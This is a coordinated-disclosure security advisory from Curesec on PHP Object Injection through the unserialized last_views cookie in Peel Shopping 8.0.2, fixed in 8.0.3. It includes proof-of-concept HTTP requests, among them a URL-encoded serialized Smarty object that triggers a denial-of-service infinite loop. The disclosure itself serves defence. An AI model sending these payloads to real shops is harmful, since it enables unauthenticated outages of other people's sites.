Peel Shopping 8.0.2: Object Injection

Peel Shopping 8.0.2: Object Injection

Date: 2016-09-15 15:51:52
Security Advisory – Curesec Research Team

1. Introduction

Affected Product: Peel Shopping 8.0.2
Fixed in: 8.0.3
Fixed Version Link:
Vendor Website:
Vulnerability Type: Object Injection
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 09/15/2016
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH

2. Overview

Peel Shopping is ecommerce software written in PHP. In version 8.0.2, it is vulnerable to Object Injection.

Peel Shopping stores a PHP object in a cookie, which is then unserialized when received by the application. An attacker can send arbitrary PHP objects, and has thus a limited influence on the control flow of the application. This can for example lead to DOS attacks by creating an infinite loop.

3. Details

The last_views cookie is passed to unserialize, leading to Object Injection. Authentication is not required.

The impact of the vulnerability is difficult to estimate, as it may increase with the existence of further modules. Without any modules installed, it can at a minimum lead to DOS.

Proof of Concept:

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 Host: localhost Cookie: last_views=[INJECTED_OBJECT];

DOS Example: The Smarty_Internal_Configfileparser class can be used to create an infinite loop.

GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Cookie: last_views=%4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d; Connection: close (Payload URL decoded: O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1;s:11:"yyTokenName";a:0:{}})

4. Solution

To mitigate this issue please upgrade at least to version 8.0.3

Please note that a newer version might already be available.

5. Report Timeline

04/11/2016 Informed Vendor about Issue
04/12/2016 Vendor announces release of fix before 05/11/2016
09/14/2016 Disclosed to public